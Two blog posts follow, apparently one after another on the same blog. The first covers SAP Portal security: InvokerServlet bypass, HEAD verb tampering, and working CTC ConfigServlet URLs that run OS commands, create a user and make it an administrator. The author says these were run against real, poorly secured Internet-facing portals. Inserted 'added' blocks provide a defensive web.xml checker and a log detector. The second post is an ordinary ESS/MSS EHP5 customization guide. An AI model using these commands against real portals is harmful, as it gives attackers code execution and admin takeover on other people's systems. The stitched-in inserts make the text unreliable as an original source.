
Sunday, January 19, 2014

SAP Portal Security, lesson 2: Hacking Servlets

In my previous post we discussed portal architecture, features and mostly Knowledge Management (KM) vulnerabilities. In this post we will discuss the main security mechanisms embedded in SAP Portal applications, and how some of them can be bypassed.

*  I assume that you are familiar with basic HTTP mechanisms (the GET, POST and HEAD methods), and that you know SAP Portal runs on a J2EE engine.

* All commands below were executed on real SAP Portal installations which are exposed to the Internet and have not been secured properly.


XML Descriptors and Invoker Servlet


Access to servlet applications deployed on the SAP Portal J2EE engine is controlled by XML deployment descriptor files (web.xml). Many of the SAP standard applications ship with serious weaknesses in these descriptors. Here is an example of such a descriptor file:

<?xml version="1.0" encoding="UTF-8"?>
<web-app>
    <display-name>HelloWorld Application</display-name>
    <description>
        This is a simple web application for Ivan's blog
    </description>
    <servlet>
        <servlet-name>HelloServlet</servlet-name>
        <servlet-class>examples.Hello</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>HelloServlet</servlet-name>
        <url-pattern>/hello</url-pattern>
    </servlet-mapping>
    <security-constraint>
        <web-resource-collection>
            <web-resource-name>Restrictedaccess</web-resource-name>
            <url-pattern>/hello/*</url-pattern>
            <http-method>GET</http-method>
        </web-resource-collection>
        <auth-constraint>
            <role-name>Administrator</role-name>
        </auth-constraint>
    </security-constraint>
</web-app>

As you can see, the servlet above is mapped to the /hello URL, and the security constraint covers the /hello/* pattern, but only for the GET method: GET requests are accepted only from users holding the Administrator role, while the descriptor says nothing about other HTTP methods. To get around such constraints, attackers can use the InvokerServlet, which is enabled in SAP Portal by default. It allows calling any servlet by class name through a generic URL, without passing through the authorization check defined in the descriptor.

The servlet above can therefore be reached by any user at http://{server:port}/servlet/examples.Hello, because that URL does not match the /hello/* pattern the security constraint is defined for.

Let's take a deeper look.


Verb Tampering


The most critical of all servlets is called CTC; its ConfigServlet allows execution of OS commands and creation of local users. Imagine that hackers could create an administrative user in your portal with a simple command called from their browser.

Here is an example of such a command, executed from the browser (it runs ipconfig on the portal host):
/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig

Now, as mentioned before, the CTC servlet can also be used to manage users. The command below creates a user in the local UME (User Management Engine):

/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME={enter your user},PASSWORD={enter your password}

The servlet even confirms it with a success message in the response.


After creating the user, we need to grant it administrative permissions. Guess what, there is a command for that as well:


/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME={enter your user},GROUPNAME=Administrators

There you go, now you have an administrator account in the system.

In the examples above we used plain GET requests. Where the descriptor restricts GET (and POST) to a role, a HEAD request can be used instead: it does not match the <http-method> list in the security constraint, so no authorization check is performed, yet the J2EE engine still dispatches it to the servlet, whose default doHead() implementation calls doGet(). The command executes; only the response body is discarded. This is what is known as verb tampering.
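To make both bypasses concrete, here is an added example (not code from the post and not an SAP component) that models the security-constraint matching a servlet container performs on a deployment descriptor. It reproduces the HelloWorld web.xml from above, derives a hardened variant from it by dropping the <http-method> element so the constraint applies to every verb, and then asks which role a request needs. The url-pattern rules (exact, "/prefix/*", "*.ext") and the "no http-method means all methods" rule follow the Java Servlet specification; the function and constant names are this example's own. It covers both the InvokerServlet path (which matches no constraint at all) and the HEAD verb-tampering case (which matches the path but not the method list).

```python
"""Which role does a request need under a given web.xml?

Added example modelling servlet-spec security-constraint matching.
Descriptors below: the post's HelloWorld web.xml, and a hardened copy
without the <http-method> element (constraint then covers all verbs).
"""
import xml.etree.ElementTree as ET

VULNERABLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app>
  <display-name>HelloWorld Application</display-name>
  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>examples.Hello</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/hello/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>Administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Hardened variant: with no <http-method> listed, the constraint applies
# to HEAD, POST, OPTIONS, ... as well, so verb tampering no longer works.
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace("<http-method>GET</http-method>", "")

DENY_ALL = "<deny-all>"  # marker for an empty <auth-constraint/> (nobody may access)


def pattern_matches(pattern, path):
    """url-pattern matching as the Servlet specification defines it."""
    if pattern in ("/", "/*"):
        return True
    if pattern.endswith("/*"):                       # path-prefix pattern
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):                     # extension pattern
        return path.endswith(pattern[1:])
    return path == pattern                           # exact pattern


def security_constraints(web_xml):
    """Yield (url_patterns, http_methods, roles) per <security-constraint>."""
    root = ET.fromstring(web_xml.encode("utf-8"))
    for sc in root.iter("security-constraint"):
        patterns, methods = [], []
        for wrc in sc.iter("web-resource-collection"):
            patterns += [e.text.strip() for e in wrc.iter("url-pattern")]
            methods += [e.text.strip().upper() for e in wrc.iter("http-method")]
        auth = sc.find("auth-constraint")
        if auth is None:            # no auth-constraint: no access restriction
            continue
        roles = [e.text.strip() for e in auth.iter("role-name")]
        yield patterns, methods, roles or [DENY_ALL]


def required_roles(web_xml, method, path):
    """Roles the request must hold; empty set means no check is performed."""
    roles = set()
    for patterns, methods, names in security_constraints(web_xml):
        if methods and method.upper() not in methods:   # verb not listed: no check
            continue
        if any(pattern_matches(p, path) for p in patterns):
            roles.update(names)
    return roles


def unconstrained_verbs(web_xml, path,
                        verbs=("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS")):
    """Verbs that reach `path` without any role check (verb-tampering candidates)."""
    return [v for v in verbs if not required_roles(web_xml, v, path)]


if __name__ == "__main__":
    for name, xml in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(name, "GET  /hello                 ->", required_roles(xml, "GET", "/hello"))
        print(name, "HEAD /hello                 ->", required_roles(xml, "HEAD", "/hello"))
        print(name, "GET  /servlet/examples.Hello ->",
              required_roles(xml, "GET", "/servlet/examples.Hello"))
        print(name, "verbs bypassing /hello:", unconstrained_verbs(xml, "/hello"))
```

Note that the hardened descriptor fixes only the verb-tampering half: /servlet/examples.Hello still matches nothing, which is why the InvokerServlet has to be disabled (or filtered in front of the engine) rather than patched in web.xml.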

Tips to keep it secure


1. Make sure your system is up to date.
2. Block direct servlet execution (for example, by SAP Web Dispatcher URL filtering).
3. Apply SAP Notes 1467771, 1445998, 1503579 and 1616259 (where relevant).
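Patching and filtering stop the attack; knowing whether somebody has already tried it needs the HTTP access log. The following is an added example, not part of the post and not an SAP tool: a small detector run over constructed log lines that reuse the three ConfigServlet commands shown above plus a HEAD-based variant and an InvokerServlet call. The log format is an assumption (a common-log-like "client - - [time] "METHOD URI HTTP/x" status size" layout); the parsing of the param value as "class;ACTION;KEY=value,KEY=value" follows the URLs on this page.

```python
"""Flag CTC ConfigServlet abuse, verb tampering and InvokerServlet calls in
an HTTP access log.  Added example; the log lines are constructed and the
common-log layout is an assumption about how the server is configured."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log (hypothetical clients; the URLs are from the post).
SAMPLE_LOG = """\
203.0.113.7 - - [19/Jan/2014:10:01:02 +0200] "GET /irj/portal HTTP/1.1" 200 5120
203.0.113.7 - - [19/Jan/2014:10:01:09 +0200] "GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig HTTP/1.1" 200 812
203.0.113.7 - - [19/Jan/2014:10:02:31 +0200] "GET /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig%3BCREATEUSER%3BUSERNAME%3Dmallory%2CPASSWORD%3Dhunter2 HTTP/1.1" 200 144
203.0.113.7 - - [19/Jan/2014:10:02:40 +0200] "HEAD /ctc/servlet/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=mallory,GROUPNAME=Administrators HTTP/1.1" 200 0
198.51.100.4 - - [19/Jan/2014:10:03:00 +0200] "GET /servlet/examples.Hello HTTP/1.1" 200 66
198.51.100.4 - - [19/Jan/2014:10:03:05 +0200] "POST /irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.portallauncher.default HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Actions the post demonstrates; any other ConfigServlet call is still reported.
HIGH_RISK_ACTIONS = {"EXECUTE_CMD", "CREATEUSER", "ADD_USER_TO_GROUP"}
NORMAL_VERBS = {"GET", "POST"}
CTC_PATH = "/ctc/servlet/ConfigServlet"


def parse_param(query):
    """Return (class, action, {key: value}) from a ConfigServlet 'param' value.

    The value is 'class;ACTION;K=V,K=V' and may be percent-encoded, so the
    query is split on '&' first and only the value is unquoted."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key != "param":
            continue
        parts = unquote(value).split(";")
        cls = parts[0]
        action = parts[1] if len(parts) > 1 else ""
        args = {}
        for kv in parts[2:]:
            for item in kv.split(","):
                k, _, v = item.partition("=")
                if k:
                    args[k] = v
        return cls, action, args
    return None


def analyze(log_text):
    """Return one (client, method, reason) finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not in the expected layout; skip
        method, target = m["method"], m["target"]
        parts = urlsplit(target)          # urlsplit keeps ';' inside the query
        path = unquote(parts.path)
        if path.startswith("/servlet/"):  # InvokerServlet: servlet called by class name
            findings.append((m["client"], method, "invoker servlet call to " + path))
        if not path.startswith(CTC_PATH):
            continue
        reason = "CTC ConfigServlet request"
        parsed = parse_param(parts.query)
        if parsed:
            cls, action, args = parsed
            if action in HIGH_RISK_ACTIONS:
                reason = f"CTC {action} via {cls.rsplit('.', 1)[-1]} args={sorted(args)}"
        if method not in NORMAL_VERBS:    # HEAD etc. against CTC: verb tampering
            reason += f" using {method} (verb tampering)"
        findings.append((m["client"], method, reason))
    return findings


if __name__ == "__main__":
    for client, method, reason in analyze(SAMPLE_LOG):
        print(f"{client:<14} {method:<5} {reason}")
```

Run it over a real log exported in the same layout; a ConfigServlet request from the Internet with any of the three actions, or with a verb other than GET/POST, should be treated as an incident regardless of the response status, since a 200 on a HEAD request carries no body to tell you whether the command ran.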

Next post will cover user secure storage and encryption, cross-site scripting (XSS) and security zone attacks.

Stay tuned :-)

Wednesday, March 13, 2013

ESS / MSS Customization in EHP5

Intro

As you may already have heard, SAP is going ABAP all the way: Employee Self-Services (ESS) are entirely ABAP-based (Web Dynpro ABAP) since the ECC EHP5 release. Manager Self-Services remain ABAP+Java, at least in EHP5. Although ESS customization is done on the ECC side, it is common practice to ask your portal consultant to do it. So, whether you are an HR consultant who wants to learn the subject or a one-man-show portal consultant, this guide will help you get started!


Pre-requisites

First of all, read the official ESS business package documentation (and the MSS one, if you are into MSS as well). Let's start with the requirements:

  1. Enable IGS on your ECC server, according to note 1527176
  2. Make sure you have the required ESS & MSS business content deployed & enabled on ECC
  3. On the portal side, create the EHP5 system in the System Landscape and add the following system aliases:
     * SAP_ECC_HumanResources
     * SAP_ECC_Common
     * SAP_EREC_TalentManagement
     Then test the connection; the connection tests must succeed.
  4. Download the following portal business content from the Service Marketplace and deploy it to the portal through JSPM or the developer studio:
     * BPERPESSWDA05 – according to note 1450179
     * BPERP5MSS05 (BP ERP05 MSS 1.51)
     * BPERPCOM05 – COMMON PARTS
     * SAP MSS 630 – MSS Web Dynpro for Java applications
     * PCUI_GP 633 – prerequisite component for the Web Dynpro for Java applications
  5. Download the following Web Dynpro Java components for MSS from the Service Marketplace (only if you plan to use MSS):
     * PCUI_GP
     * MSS
     * SAP_PSS (if you use project management)
  6. Create the required RFC connections in the Web Dynpro Content Administrator
  7. Assign yourself the roles provided in the business content:
     * ESS: com.sap.pct.erp.ess.wda.Employee_Self_Service_WDA
     * MSS: com.sap.pct.erp.mss.manager_self_service

Launchpad Customization

The launchpad is the first screen users land on when accessing ESS. Follow these steps in ECC:

  1. Run transaction LPD_CUST and select the ESS MENU launchpad
  2. Copy the launchpad to ZESS
  3. Remove unrelated applications (delete them or move them to an inactive folder)
  4. You can add your custom portal applications using URLs starting with /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2f...
  5. Change the role of the launchpad to ZESS, which was created in step 2
  6. Save and exit

ESS Customization

Here you will see an example of personal info page customization.

  1. Go to SE80 and open package PAOC_ESS_PER_WDA
  2. Drill down to the application configuration and click "Start Configurator"
  3. Click "Go to component configuration" and then "Start Deep Copy"
  4. Create a new package and a new transport request, then click "Ok". You will end up with a new configuration.
  5. Once your custom deep-copy component configuration is created, press Shift+F8 to launch the UIBB (UI building block) customization
  6. Once customized, go to LPD_CUST and set your new application configuration instead of the standard one

Refer to the SAP documentation to find the component package & name you would like to customize.

* MSS customization is still performed the old Java way: launch the relevant application in Preview mode from the portal Content Administration, then Ctrl + right-click.

If you are interested in further development & support, please contact me directly.

Good luck!